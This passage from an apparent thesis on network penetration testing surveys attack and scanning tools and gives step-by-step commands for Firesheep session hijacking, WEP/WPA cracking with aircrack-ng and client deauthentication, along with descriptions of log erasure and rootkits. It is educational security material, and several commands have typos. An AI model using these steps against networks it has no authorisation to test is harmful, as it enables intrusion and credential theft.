The idle scan technique is used to discover the open ports on 192.168.1.5 whiles it uses the Ait_host
(192.168.1.2) to communicate with the technique target host so this is an idle technique to scan target
computer anonymity.

Firesheep: Is a Firefox add-on, it has recently become very popular for easily carrying out an Http
session hijacking attack. Http seesion hijacking attack cant be considered as a very sophisticated attack
but needs some technical knowledge to be performed. But Firesheep makes the attacka childs play
however; firesheep was developed by Eric Butler for Firefox browser. It was released at Toorcon 12 to
demonstrate how serious cookie stealing can be done.
When you provide your username and password in login forms of different website and submit it, the
browser first encrypts the password and then sends it over the network. The corresponding website
compares the information against its internal database and if they match, it sends a cookie (a small text
file) to your browser. The browser saves this cookie and uses it to authenticate the user on the website
every time the user opens a different page of the website.
When the user logs out of his /her account, the browser just deletes the cookie. Now the problem so that
the cookies are not encrypted before sending over the network, due to this a hacker can capture this
cookies and use them to authenticate him/herself as the user from whom the cookies was stolen.
Now lets see how to use Firesheep

52

First download and install WinPcap (WinPcap is windows is used for capturing network traffic).
Download and open Firesheep in Firefox, it will automatically install it, or just drag it and place it over
Firefox shotcut. After it is installed, in Firefox go to View---- Sidebar ---- Firesheep. A side bar will
appear in the browser with a button start capturing , press it and sit back. In few secods you will see
account details with photos of the target machine. Click on one of it and you willdirectly enter in his/her
account.

3.3.3 Wireless Discovery and Scanning Tools


Kismet: Is an 802.11 wireless network detector, sniffer, and intrusion detection system. Kismet will
work any wireless card which supports raw monitoring mode, and can sniff 802.11b, 802.11a, 802.11g,
and 802.11n traffic (devices and drivers permitting).
Kismet also sports a plugin architecture allowing for additional non-802.11 protocols to be decoded.
Kismet identifiers networks by passively collecting packets and detecting networks, which allows it to
detect hidden networks and the presence of non-beaconing networks via data traffic.
Whiles Kismet is an open source product and very powerful, one downside to Kismet is its relative
complexity. It works best on Linux or Berkeley Software Distribution (BSD), and also works on
Windows when using the AirPcap packet capture hardware.

Wireshark, a network analysis tool formerly known as Ethereal, captures packets in real time and
display them in human-readable format. Wireshark includes filters, colour-coding and other feature that
let you dig deep into network traffic and inspect individual packets. The series of data that wireshark
inspect are called Frame which includes Packets. Wireshark has the ability to capture all of those
packets that are sent and received over your network and it can decode them for analysis. When you do
anything over the internet, such as browse websites, use Voip, IRC etc, the data is always converted into
packets when it passes through your network interface or your LAN card.
Wireshark will hunt for those packets in your TCP/IP layer during the transmission and it will keep, and
present this data, on its very own GUI.
It is important to note that whilst this is an excellent tool for a network administrator that needs to check
that their customers sensitive data is being transmitted securely- it can also be used by hackers on

53

unsecured networks- such as airport WiFi. Moral of the story at this point is to stay clear of clear text
http protocols: that is the best advice we can give. To remedy this we would encourage you to use a
Firefox add on called https everywhere or use an SSH or VPN tunnel.
Wireshark as a Packet Sniffer is an application which can capture and analyze network traffic which is
passing through a systems Network Interface Card (NIC). The sniffer sets the card to promiscuous
mode which means all traffic is read, whether it is addressed to that machine or not. The figure below
shows attacker sniffer packets from the network, and the Wireshark packet sniffer/analyzer (formally
known as ethereal).

Figure 3.17

54

Figure 3.18 Wireshark Packets Sniffer interface.

3.3.4 Web Application Discovery /Scanning Tools

Burp suite tool is an integrated platform for attacking web applications. It contains all of the
Burp tools with numerous interfaces between them, designed to facilitate and speed up the
process of an attacking an application. All tools share the same robust framework for handling
HTTP request, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan,
attack and exploit web application. The various Burp tools work together effectively to share
information and allow findings identified within one tool to form the basis of an attack using
another.
Burp Suite is made up of the following description tools;
Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web
applications. It operates as a man-in-the-middle between the end browser and the target
web server, and allows the user to intercept, inspect and modify the raw passing in both
directions.
Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent
techniques to generate a comprehensive inventory of an applications content and
functionality

55

Scanner: Burp Scanner is a tool for performing automated discovery of security


vulnerabilities in web applications. It is designed to be used by penetration tester, and to
fit in closely with your existing techniques and methodologies for performing manual
and semi-automated penetration tests of web applications.
Intruder: Burp Intruder is a tool for automating customized attacks against web
applications.
Repeater: Burp Repeater is a tool for manual modifying and reissuing individual HTTP
request, and analyzing their responses. It is best used in conjunction with the other Burp
Suite tools. For example, you can send a request to Repeater from the target site map,
from the Burp Proxy browsing history, or from the results of Burp Intruder attack, and
manual adjust the request to fine-tune an attack or probe for vulnerabilities.
Sequencer: Burp Sequencer is a tool for analyzing the degree of randomness in an
applications session tokens or other items on whose unpredictability the application
depends for its security.
Comparer: Burp Comparer is a simple tool for performing a comparison (a visualdiff)
between any two items of data. In the context of attacking a web application, this
requirement will typically arise when you want to quickly identify the difference
between two application responses (for example, between two responses received in the
course of a Burp Intruder attack, or between responses to failed login using valid and
invalid usernames), or between two application requests (for example, to identify request
parameters that give rise to different bahaviour).
To begin using the Burp Suite to test, we need to configure our web browser to use the Burp
Suite as a proxy. The Burp Suite proxy will use port 8080 by default but you can change it if you
want.
You can see in the image below of a proxy being configured.

56

Figure 3.19 Proxy settings configuration window interface.

Once Burp Suite is started, it is recommended to define your target host in the scope. This allows
you to control what is displayed in the site map, and other Burp features. Scope can be defined
by adding a target host, IP, or network range:

57

Figure 3.20 showing BurpSuite tool interface.

WebScrarab is a framework for analyzing applications that communicate using the HTTP and
HTTPS protocols. It is written in java, and is thus portable to many platforms. Webscarab has
several modes of operation, implemented by a number of plugins, and in most common usage,
WebScarab operated as an intercepting proxy, allowing the operator to review and modify
request created by the browser before they are sent to the server and to review and modify
responses returned from server before they are received by the browser. WebScarab is able to
intercept both HTTP and HTTPS communication.
The operator can also view the conversations (requests and responses) that have passed through
WebScarab.
An important feature of WebScarab is its ability to record and therefore audit traffic for further
review.

Nikto is a vulnerability scanner that scans webservers for thousands of vulnerabilities and other
known issues. It is very easy to use and does everything itself, without much instruction.
Nikto is a very popular (open source) web server scanner which is able to execute in-depth scans
and test against web servers seeking vulnerabilities. The program scans for nearly 10,000 known
dangerous files and programs and also has the additional huge benefit of checking for outdated
version of 1,250 servers. As a result Nikto is hugely popular amongst System Administrators.
Nikto also verifies server configuration items such as:
Multiple index Files
HTTP/HTTPS Server Configuration (Correct Port Listings)
Identify Web Servers info & Identify for stealth.
There are many options in using nikto, this is one of the basic syntax, such as this:

Nikto h <IP or Hostname>

Let us start with http service on a machine on a network scanning web server. Lets scan it for
vulnerabilities by typing: nikto h 192.168.1.104 therefore Nikto responds with a lot of
information, as you can see below in figure 3.11

58

Figure 3.21
First, it tells us the server is Apache 2.2.14, probably on Ubuntu. It nailed this info and gives up
more information on other potential vulnerabilities on this web server.
Feature of Nikto web scanner are as follows;

Supports SSL

Supports full http proxy

Supports text, HTML, XML and CSV to save reports

Scan for multiple ports

Can scan on multiple server by taking inputs from files like nmap output

Support LibWhisker IDS

Capable enough to identify installed software with headers, files and favicons

Logs for Metasploits

Reports for unusual headers

Apache and cgiwrap user enumeration

Scan can be Auto-pause at specified time.

3.4. VULNERABILITY ANALYSIS

3.4.1 Vulnerability scanning tools

59

Nmap is a security scanner used to discover hosts and services on a computer network, thus
creating a map of the network. To accomplish its goal, Nmap sends specially crafted packets to
the target host and then analyzes the responses. Unlike many simple port scanners that just send
packets at some predefined constant rate, Nmap accounts for the network conditions during the
run.
Nmap has been able to extend its discovery capabilities beyond simple figuring out whether a
host is up or down and which port are open and closed.
Nmap can determine the operating system of the target, names and versions of the listing
services, estimate up time, type of devices, and presence of a FIREWALL.
However,
OpenVAS: The Open Vulnerability Assessment System, known more commonly as OpenVAS,
is a framework of several services and tool offering a comprehensive and powerful vulnerability
scanning and vulnerability management solution.

Architecture Overview

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and
tools. The core of this SSL-secured service-oriented architecture is the OpenVAS scanner. The
scanner very efficient executes the actual Network Vulnerability Tests (NVTs) which are served
with daily updates OPENVAS NVT Feed or via a commercial feed service.

Figure 3.22

60

The OpenVAS Manager is the central services that consolidate plain vulnerability scanning into
a full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS
Transfer Protocol) and it offers the XML- based, stateless OpenVAS Management Protocol
(OMP). All intelligence is implemented in the manager so that it is possible to implement various
lean clients that will behave consistently e.g. with regard to filtering or sorting scan results. The
Manager also controls a SQL database (sqlite-based) where all configuration and scan result data
is centrally stored.
The OpenVAS Administrator acts as a command line tool or as a full service daemon offering
the OpenVAS Administrator Protocol (OAP). The most important task are the user management
and feed management.
The OpenVAS Scanner offers the communication protocol OTP (OpenVAS Transfer Protocol)
which allows to control the scan execution. The protocol is subject to be eventually replaced and
thus it is not recommended to develop OTP client.
OpenVAS tool is among the integrated tools in Kali- Linux operating system for penetration
testing.
Nessus was founded by Renuad Deraison in 1988 to provide the internet community with a free
remote security scanner. It is one of the full-fledged vulnerability scanners that allow you to
detect potential vulnerabilities in systems. Nessus is the worlds most popular vulnerability
scanning tool and is supported by most research teams around the world.
Nessus uses a web interface to set up, scan, and view reports.
The key features of Nessus can be identifies as follows;

Identifies vulnerabilities that allows a remote attacker to access sensitive information


from the system

Checks whether the systems in the network have the latest software patches

Tries with default passwords, common passwords, on system account

Configuration audits

Vulnerability analyses

Mobile device audits

Customized reporting

Nessus uses a client/server design that allows the user to set up one Nessus server that has
multiple Nessus clients that can attach and initiate vulnerability scans.

61

Target System
SSL

Nessus client

Server running Nessus


Daemon

Target System

Figure 3.23

After client/server configuration is done. By default Nessus runs on port 8834 and can be access
with any Flash enabled web browser. There are four navigation tabs at the top of Nessus window
interface, which are;

Reports: The reports tabs list the results of scans you have conducted, are currently
running or have imported.

Scans: The Scans tab list currently running scans, scan templates and scheduled scans.

Policies: The Policies tab list the scan configurations available for scans.

Users: The Users tab list users and allows the addition, deletion or editing of users
accounts.

3.4.2 Network vulnerability scanner tools


Cisco-global exploiter (CGE): It is an advance, simple and fast security testing tool/ exploit
engine that is able to exploit 14 vulnerabilities in disparate Cisco switches and routers. CGE is
command-line driven perl script which has a simple and easy to use front-end.
Cisco-Global-Exploiter can exploit the following 14 vulnerabilities:
1. Cisco 677/678 Telnet Buffer Overflow Vulnerability
2. Cisco IOS Router Denial of Service Vulnerability
3. Cisco IOS HTTP Auth Vulnerability
4. Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
5. Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

62

6. Cisco 675 Web Administration Denial of Service Vulnerability


7. Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
8. Cisco IOS Software HTTP Request Denial of Service Vulnerability
9. Cisco 514 UDP Flood Denial of Service Vulnerability
10. Cisco Secure ACS for Window NT Server Denial of Service Vulnerability
11. Cisco Catalyst Memory Leak Vulnerability
12. Cisco CatOS Cisco View HTTP Server Buffer Overflow Vulnerability
13. 0 Encoding IDS Bypass Vulnerability (UTF)
14. Cisco IOS HTTP Denial of Service Vulnerability
This software tool can be run on Backtrack operating system for penetration testing.

Yersinia is a free open source utility written entirely in c which is great for security
professionals, penetration testers and hackers enthusiasts alike. Yersinia is a solid framework for
analyzing and testing network protocols, and it is a great network tool designed to take advantage
of some weaknesses in different network protocols. Yersinia allows you to send raw VLAN
Trunking Protocol (VTP) packets and also allows you add and delete VLANs from a centralized
point of origin.
One of the useful features with Yersinia is the Dynamic Host Configuration Protocol (DHCP)
attack. With this a DHCP starvation attack works by broadcasting DHCP request with spoof
MAC addresses. This is easily accomplished with Yersinia, if enough requests are sent; the
network attacker can exhaust the address space available to the DHCP provider for a period of
time. With Yersinia, regarded of whether it is connected via a wired or wireless loses its network
connection. Once the attack is stopped the DHCP clients can reconnect and are able to use the
network again.
Yersinia also runs as a network daemon (#yersinia -D) and allows you to setup a server in each
network segment so that network administrators can access their networks. Yersinia listens to
port 1200 on tcp by default and allows you to analyze the network packets traversing the
network.
This is very useful because you can determine the misconfigurations on your network segment
and correct them before an attacker takes advantage of them. With Yersinia you can also launch
Hot Standby Router Protocol (HSRP) attacks, the first option with sending HSRP packets is

63

simply sending custom HSRP packets, and you can then test HSRP implementations on the local
network segment. Another option is becoming the active router with a fake IP which results in a
Denial of Service (DOS). You can also launch a Man in the Middle (MITM) attack by becoming
an active router by editing the HSRP packets field in the attacked routers, by enabling IP
forwarding on the attackers machine and providing a valid static route to the legitimate gateway
the traffic, the traffic from the victims machine will go through the attackers platform and will be
subject to analysis and /or tampering.
Only two disadvantages within Yersinia tool are worthy of mention. The first is that it was
created solely for the nix community and is not available for windows platform. The Yersina
team has requested that the community contribute to the windows platform, so all the windows
enthusiasts can benefit. Secondly, the Yersinia is written in Spanish words.

3.5: ATTACKING PHASE


3.5.1: Gaining Access Tools (Password Access Tools)

There are many password breaking access tools and these are some of the commonest tools are;

THC Hydra

Dbpwaudit

Cisco-audit-tool

Onesixtyone

Acccheck

John the Ripper

Ophcrack

I am using this opportunity to elaborate the functions few of the listed tools.
THC-Hydra is a classic password cracking tool. STRICTLY SPAEKING Hydra is a network
logon password cracking tool, which is actually very fast. A great feature about Hydra is that you
can add modules to increase the functionality of this hacking tool.
THC Hydra is a software project developed by van Hauser from the organization called the
hackers choice (THC) and David Maciejak. It uses a dictionary attrack to test for weak or
simple passwords on one or many remote hosts running a variety of different service. It was

64

designed as a proof-of-concept utility to demonstrate the ease of cracking poorly chosen


password.
THC Hydra is a parallized login cracker which supports numerous protocols to attack however,
this tool is a proof of concept code, to give researchers and security consultants the possibility to
show how easy it would be to gain unauthorized access from remote to a system. This tool is for
legal purposes only.
There are already several login hacker tools available, however none does either support more
than one protocol to attack or support parallized connects. It was tested to compile cleanly on
Linux, Windows/Cygwin, Solaris, FreeBSD and OSX.
Currently this tool supports the following protocols:
TELNET, FTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC, irc,
RSH, RLOGIN, CVS, SNMP, SMTP, SOCKS5, VNC, POP3,IMAP, NNTP, PCNFS, XMPP,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable, AFP,
Subversion/SVN, Firebird, Cisco AAA (incorporate in telnet module). For HTTP, POP3, IMAP
and SMTP, several login mechanism like plain and MDS digest are supported.

Cisco-auditing-tool integrated in Backtrack 5 operating system. The cisco-auditing-tool located


in the Backtrack menu (Backtrack> Vulnerability Assessment> Network Assessment> Cisco
Tools) is written in perl and accomplishes three tasks which include attempting to brute force the
telnet password on a cisco device if telnet is running.
This tool is fairly outdated as most Cisco devices in corporate networks should now be using
SSH and it would seem surprising unless you are doing an internal audit if SNMP was exposed
for any Cisco devices still in service.

John the Ripper is a popular dictionary based password cracking tool. It uses a wordlist full of
passwords and then tries to crack a given password hash using each of the password from the
wordlist. In other words it is called brute force password cracking and is the most basic form of
password cracking. It is also the most time and CPU consuming technique. More the passwords
to try, more the time required.
John is different from tools like hydra. Hydra does blind brute forcing by trying
username/password combinations on a service daemon like ftp server or telnet server. John

65

however needs the hash first. So the greater challenge for a hacker is to first get the hash that is
to be cracked. Now a days hashes are more easily crack-able using free rainbow tables available
online. Just go to one of the sites, submit the hash and if the hash is made of common word, then
the site would show the word almost instantly.
Rainbow tables basically store common words and their hashes in a large database. Larger the
database, more the words covered.
Ophcrack is a free Windows password cracker based on rainbow tables. It is very efficient
implementation for rainbow tables done by the inventors of the method however; it comes with a
graphical interface and runs on multiple platforms.
Ophcrack is an open source program that cracks Windows passwords by using LM hashes
through rainbow tables. The program includes the ability to import the hashes from a variety of
formats, including dumping directly from the Security Account Manager (SAM) files of
windows. It is claim that these tables can crack 99.9% of alphanumeric passwords up to 14
characters in usually a few minutes.
Features of Ophcrack are the following;

Runs on Windows, Linux/Unix, Mac OS X

Cracks LM and NTLM hashes

Free tables available for Windows XP and Vista

Brute-Force module for simple passwords

Audit mode and CSV export

Real-time graphs to analyze the passwords

LiveCD available to simplify the cracking

Loads hashes from encrypted SAM recovered from a Windows partition, Vista included

Free and open source software (GPL)

Screen shot of Ophcrack password cracking interface

66

Figure 3.24

3.6. Vulnerability Exploitation Tools


Before knowing the functions of metasploit framework, you have to know some little basic terms
of hacking.

Vulnerability: A flaw or weakness in system security procedures, design or


implementation that could be exploited resulting in notable damage. Vulnerability within
a system lies with poor coding, bugs, or misconfiguration. These are the points where
hackers or pen testers try to drive a wedge into so they can gain access to a system.

Exploit: A piece of software that take advantage of a bugs or vulnerability, leading to


privilege escalation or Denial Of Service (DOS) attacks on the target. Exploit is designed
to take advantage of a flaw or vulnerability in a computer system. To explain in other
terms, exploitation would be similar in using a lock pick on a door to gain access to a
house.

Overflow: Error caused when a program tries to store data beyond its size. May be used
by an attacker to execute malicious codes.

Payload: An actual code which runs on the compromised system after exploitation

67

Auxillary: It provide additional functionality like fuzzing, scanning, DOS attack, recon.,
etc. Auxillary scans for banners or OSs, fuzzes or DOS attack on the target. It does;nt
inject a payload like exploit meaning you wont be able to gain access to a system using
an auxillary.

Encoders are used to obfuscate modules to avoid detection by a protection mechanism


such as an antivirus or a firewall. This is widely used when we create a backdoor. The
backdoor is encoded (even multiple times) and sent to the victim.

Shellcode is a set of instructions used as a payload when exploitation occurs. Shellcode is


typically written in assemble language. In most cases, a command shell or a metasploit
shell will be provided after the series of instructions have been performed by the target
machine.

A Listener listens for connections from a payload injection into a compromised system.

Post as the name suggest, these modules are used for post-exploitation. After a system is
been compromised, we can dig deeper into the system or set it as a pivot to attack other
systems using these modules.

Nops is No Operation popularly known as for x86 processor. This is related to shellcode
and machine language instructions. Briefly it prevents a program from crashing while
using jump statements in it shellcode. Nops kind of loops the machine language
instruction from the beginning if it lands into an invalid memory location after issuing a
jump statement. Thus prevents the payload from crashing.

Here is a brief block diagram about the architecture of metasploit

68

Figure 3.25 Metasploit architecture

Metasploit is an open source penetration testing framework, used for developing and executing
attacks against target systems. It has a huge database of exploits; also it can be used to write our
own exploits.
Metasploit exploitation is very simple concept. The structure of an exploit is essential, the
exploit combined with a payload. The exploit is what is used to leverage the vulnerability to gain
access and the payload is what is thrown at the distance machine once the hole has been
created by the exploit.
Metasploit comes with varieties of interfaces which are enumerated as follows;

Msfconsole: an interactive curse like shell to do all tasks.

Msfcli: calls msf functions from the terminal/cmd line itself.

Msfgui: the metasploit framework graphical user interface

Armitage: another graphical tool written in java to manage pen test performed with msf.

A meterpreter shell or a root level shell on the target is often the goal as it will allow you
privileges and functionality to do whatever you want. This could include data extraction,
malware transfer, backdoor creation or lateral movement to another machine on the network.

3.7 Wireless Attack Tools.


There are numerous types of wireless attacking tools however; I am narrowing it to only two
which are;

69

Aircrack-ng is a suite of tools that allows you to monitor, gather packets, inject them and finally
crack a networks key in order to gain access. Nearly all wireless networks now use WPA2 for
security as you will see WEP security just wont meet the requirement any more.
Most wireless networks will use either WEP or WPA, to be able to crack either of these, you will
need to have a wireless card that can both monitor and inject packets. These are the commonly
step by step procedures for using aircrack-ng tool.

Step 1: Setting up your wireless card;


In order to capture network traffic without associating with the target access point, we need to set
our wireless network card in a monitor mode. To do this, open a terminal window and type:
iwconfig
This will find all wireless network interfaces and their current status. In Linux environment
wlan0 represent wireless interface card. Next you will want to run the command by typing
airmon-ng start wlan0 on the terminal.
This will set that wireless interface (wlan0) into monitor mode. If you can run iwconfig again
you will see what looks like another device has appeared, in my case it appears as mon0. This is
just the monitoring side of your wireless card that we will use for the next step.

Step 2: Monitoring available access points


Now that you have your wireless card in monitor mode, lets check out what Access Points
(APs) are available in our area by running this command; airodump-ng mon0

Figure 3.25

As mentioned in step 1, you will now use mon0 instead of wlan0 to monitor the networks. By
running airodump-ng this activates a passive listening mode were we can see all Access Points
available to you and some details about them. All you need to do now is to select a target of your

70

choice, once you have done that note down its channel and BSSID (MAC adddress). It is handy
to note down any station that is associated with the same BSSID.

Step 3: Capturing Data


WEP is easy to crack compared to WPA-PSK. This is due to the fact that we only need to
capture between 20k and 40k of interesting packets. Cracking WPA-PSK is a little harder as we
need to carry out a dictionary attack on a captured handshake between the access point and the
associated client. To capture data from a single access point, we run this command;
Airodump-ng c 6 bssid 00:0f:cd:45:74:55 w HackThis mon0

Figure 3.27

This is a breakdown of the command we just used


This will capture data on channel 6 only; -c 6
This is the MAC address of our targets access point: bssid 00:0f:cd:45:74:55
This saves captured packets into a file called HackThis in the current directory: -w HackThis
This states the wireless adaptor that we have used to carry out the data being captured: mon0

Step 4: How to Increase Traffic


The time taken to capture the data from the target network can vary depending on how many
users are connected and if they are actively using it. Sometimes you may need to speed up this
process as users are in-active and it would take hours to gather the number of packets required to
crack the key.

71

This is where injecting packets comes into play. By injecting packets you will increase the traffic
on the wireless network which in turn will reduce the time required to capture the quantity of
data we need.
To carry out the next step, you will have to open another terminal window and type the
command; aireplay-ng -3 b 00:0f:cc:7d:67:00 h 00:a5:14:2f:a5:d0 x 50 wlan0
-3 type of attack, in our case ARP request replay
-b MAC address of access point
-h MAC address of associated client from airodump-ng
-x 50 limited to sending 50 packets per second
Wlan0 again our wireless network interface

Figure 3.28
As mentioned earlier WEP cracking is the easiest to do as you only need to collect a certain
amount of data. To crack the WEP key, run the following command; aircrack-ng,HackThis.cap
Remember that you require around 20k and 40k worth of packets; you can sometimes do it with
around 10k packets if the target only had a short key/password.

Step 6: Cracking WPA or WPA2 PSK


Cracking WPA is similar to WEP up to the point where you are gathering packets. This time you
have to wait for because this cracking process is a successful capture of the four-way handshake
association between the access point and the client machine. To do this, you set the capture going
as in step 3 then either wait for a device to authorize with the access point or before then deauthenticate a client so that they have to reconnect, essentially booting them off their own

72

network for a fraction of time then capturing the handshake when they reconnect. To do deauthenticate a client, you carry out thenfollowing command in a separate terminal;
Aireplay-ng deauth 3 a APMAC c ClientMAC mon0
APMAC is the MAC address of the access point
ClientMAC is the MAC address of the associated client

Step 7: Cracking the WPA key


Once you have captured a four-way handshake, you will need a large dictionary file therefore
you can run this command; aircrack-ng w wordlist capture_HackThis
Wordlist is your dictionary file and capture_HackThis is a .cap file with a valid WPA handshake.
The length of time it will take crack a WPA key is based on the length of the targets password
and the quantity of your wordlist/dictionary file.

Fern WiFi Cracker is a wireless security auditing and attack software program written using the
Python Programming Language, the program is able to crack and recover WEP/WPA/WPS keys
and also run other networks based attacks on wireless or Ethernet based networks.

Fern WiFi Cracker


Fern Wifi Cracker is a wireless security auditing and attack software program written using the
Python Programming Language and the Python Qt GUI library, the program is able to crack and
recover WEP/WPA/WPS keys and also run other network based attacks on wireless or Ethernet
based networks.
This is a step on how to use Fern Wi-Fi cracker that comes with Kali-Linux. The illustration for
using Fern tool is by cracking a device connected to a network.

Step 1: Setting up ypur Wi-Fi adaptor to a monitor mode


Open a terminal window and type: airmon-ng start wlan0

73

Figure 3.29

Step 2: Launch Fern Wi-Fi Cracker


Once the Fern is launched, click on the select interface as seen below

Figure 3.30

74

Now if your wireless card successful entered monitor mode from the first step, you should see
the following below;

Figure 3.31

Step 3: Detecting a network to crack


Click the top button highlighted below to activate the search, your results will be displayed as
WEP or WPA network as seen below, you then click on the relevant button example WPA:

75

Figure 3.32

Step 4: Select a network to crack


Click on your chosen network then ensure that you click regular attack, browse to your
dictionary file and select it, then wait for the program to find a client to death.

Figure 3.33
The program has a wordlist (file path seen below) but its not great you will want to have your
own network to crack with strong passwords.

76

Figure 3.34

Step 5: Attack the network


Once selecting a wordlist file (highlighted below as common.txt) and a client MAC to deauth,
you can run your attack;

Figure 3.35
As you can see below the wordlist common.txt does not contain a password so you will need to
either use a different wordlist or update this one.

Figure 3.36

77

To save time, I updated the wordlist with the password of the network and as you can see below
it has been cracked.

Figure 3.37

3.8. Browser Exploitation Framework (BeEF)


BeEF is a Browser Exploitation Framework and is an open source penetration testing tool that focuses
on browser-based vulnerabilities. That means BeEF is extremely useful for social engineers with fake
websites.
We can categorizw the BeEF social engineering framework as shown in the picture below;

78

Figure 3.38

BeEF is part of Social Engineering Tool kit which is shown in the diagram however, we can use BeEF
to host malicious website, which is then visited by internet users. The BeEF is used to send commands
that will be executed on the web browser of the victim computer. The victim users will be added as
Zombies to the BeEF framework.
When the attacker logs into the BeEF server, he /she can then execute the modules against the specific
victim user. An attacker can execute any module or write his/her own module which enables the person
to execute an arbitrary command against the victim zombie.
BeEF uses browser vulnerabilities to gain control of the target computer system. BeEF provides an API
that we can use to write our module to attack the target web browser. Therefore the BeEF provides the
API that abstracts the complexity and makes possible the quick and effective creation of modules.

3.9. Evading Defenses and Erasing Tracks


The most important aspect of hacking that must be consider crucial is making sure that after your
attack your tracks cannot be trace. However Steganography technology is an art and science of hiding
information by embedding messages within other, seemingly harmless messages. Steganography works
by replacing bits of useless or unused data in regular computer files such as graphics, sound, text,
HTML with bits of different, invisible information. This hidden information can be plain text, cipher
text, or even images.
For obvious reasons, such as avoiding legal trouble and maintaining access, attackers will usuall attempt
to erase all evidence of their actions. Trojans such as ps or netcat are often used to erase the attackers
activities from the system log files. Once the Trojans are place, the attacker has likely gained total
control of the system. By executing a script in a Trojan or rootkit, a variety of critical files are replaced
with new versions, hiding the attacker in seconds.

79

Other techniques include steganography and tunneling. Steganography is the process of hiding data in
other data, for instance image and sound files. Tunneling takes advantage of the transmission protocol
by carrying one protocol over another. Even the small amount of extra space in a data packets TCP and
IP headers can be used for hiding information. An attacker can use the compromised system to launch
new attacks against other systems or use another attack reconnaissance phase.
System administrators can deploy host-based Intrusion Detection System (IDS) and antivirus software in
order to detect Trojans and other seemingly compromised files and directories. As an ethical hacker, you
must be aware of the tools and techniques that attackers deploy, so that you are able to advocate and
implement countermeasures.
Whenever a hacker performs any activity such as active reconnaissance to an attacking phase, know that
such activity has been recorded by the compromise machine. However, these programs are capable to
record a hacker activity;

System log filed

File Access Times

Windows Registry Entries

Intrusion Detection System

Proxy Servers

Firewalls

Hackers must do due diligent in OS and application softwares running on a compromise machine
therefore, to know how to delete recorded entries.
Rootkit is used to maintain access and prevent logging of action performed on a compromised machine.
The term rootkit is a kit consisting of small and useful programs that allow an attacker to maintain
access to root the most powerful user on a computer. In other words, a rootkit is a set of programs and
code that allows a permanent or consistent, undetectable presence on a computer.
The most important word in describing rootkit is undetectable. Most of the technology and tricks
employed by a rootkit are designed to hide code and data on a system however; many rootkits can hide
files and directories. Other features in a rootkit are usually for remote access and eavesdropping-for
instance, for sniffing packets from the network. When combined, these features deliver a knockout
punch to security.

80

Rootkits are often installed by the attacker as soon as he/she gains administrative access level to the
target machine. Rootkits operate by modifying the kernel of the operating system itself which makes it
really hard or difficult to detect.
The main job of rootkit is to provide an attacker unauthorized access to compromised systems. Once an
attacker gets access to the target system he/she may want to revisit system for some other malicious
activities. In general a rootkit is a group of programs or tools like sniffers, keyloggers, spyware, remote
administration, log cleaner, trace removers, etc. Rootkit can crack the password at the admin level as
well as exploit the systems vulnerability.
As mentioned earlier the main motive of rootkit is to allow repeated access of attacker to target system,
installing RAT or backdoor process can allow server to meet hacker this objective.
To facilitate continued access, a rootkit may disable auditing and edit event log to hide its presence,
now, why an attacker thinks to plant a rootkit, the answer is very simple it provides undisputed and
uninterrupted access that is super user mode, automatically sniffs important data from network. It can
easily hide inside command or process; can bypass nearly all security measures once installed.

81

CHAPTER 4
LABORATORY IMPLEMENTATION DETAILS AND RESULTS

4.0

INTRODUCTION:

In this part of thesis report, a proposed framework of Network Penetration Testing has been
designed and implemented on Campus Network. The proposed methodology helps when
applying it on real world scenario. Since non-commercial open source tools are available which
has no full features for Penetration testing. Hence, these open source tools have been used for
profiling campus network using network penetration testing.
There are many sophisticated software tools however, the most common software tools will be
used for implementation and testing purposes to ascertain the practicality of the methodology.

4.1 PROPOSE FRAMEWORK FOR NETWORK PENETRATION TESTING

Figure 4.1

82

Planning and Information gathering phase are the most important part of any Penetration testing.
So, proper time and effort should be given on this part. The , after discovery and Attack phase,
which means exploiting any vulnerability, post exploitation should be done, so that one should
know how much deep an attacker can go and damage systems and networks. A post exploitation
phase also consist of installing backdoors, rootkits and malicious software or programs on the
remote target machine.
Then after Post Exploitation, clean up phase is there. Here, all the entries or logs are deleted, so
that nobody should know about an attackers visit. And in the end, Reporting phase is all about
the vulnerabilities found and countermeasures are also given for securing the network from
attackers.
During implementation process an isolated network was setup in a campus network for finding
vulnerabilities and loopholes and then exploit them for demonstration purposes.

4.2

PLANNING

Planning is the most important aspect in penetration testing or hacking where methodology are
drawn and most accurate software tool are to be used. In this section the operating system to be
used is also chosen, additionally, if pen testing is the work in hand therefore, an agreement
between the red team company and the client has to be signed where the scope of the test are
outline for security reasons, confidentialities, risks, and other aspect such as financial obligation.
Emphasizing on scope, penetration testing should b carefully defined to specify which device,
networks and services should be included in a test environment. It tells which systems are to be
tested during the testing phase. With respect to the scope of penetration testing, distinguish three
metrics namely full, limited and focused, thereby reducing the complexity and cost of the
solutions. The time spend for the penetration testing is directly linked to the scope of the systems
to be investigated.

Details of the three metrics of scope are as follows;

A full test systematically examine overall system. It should be noted that even in a full test
certain (i.e. outsourced and externally hosted systems) might not be able to be tested.

83

With a limited access penetration testing, only part of the system which forms a logical whole is
investigated. For instance, all system in DMZ or systems comprising an operational or a
functional unit can be tested.

With focused approach only one part of the system or on just one service within the systems are
concentrated and tested. For instance, this test scope is appropriate after a modification or
extension of the system landscape. Such a test can only provide information about the part of the
system or service that was tested. It cannot provide general information about the overall security
of the system.

4.2.1

REQUIREMENTS FOR A PENETRATION TEST

Before a penetration test is conducted, certain key issues need to be placed in order to ensure
useful and timely results. It includes the technical requirements such as time constraints, cover the
full range of the threats, the range of IP addresses over which the test is to be conducted and the
systems that are to be attacked and also those that are not to be attacked as part of the test with
minimal disruption to normal operation. Other requirements may also include legal and contractual
issue specifying liability, information to individuals regarding the test taking place. Such
requirements can be vary depending on legal structures in the organization or even the host country
of the organization.
Beside above mentioned requirements, there are a number of ethical and technical competency
issues that penetration testers face in conducting test, from testing systems or protocols not explicitly
included or excluded from a test. Although code of conduct and Best Practice is laid out by
numerous professional bodies, in actual practice the penetration tester is often required to take an
